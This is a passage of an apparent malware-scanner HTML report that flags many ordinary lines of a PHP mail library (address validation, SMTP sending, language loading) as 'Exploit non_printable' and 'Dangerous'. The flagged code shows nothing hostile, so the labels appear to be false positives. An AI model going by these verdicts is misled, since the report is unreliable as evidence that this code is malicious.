</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
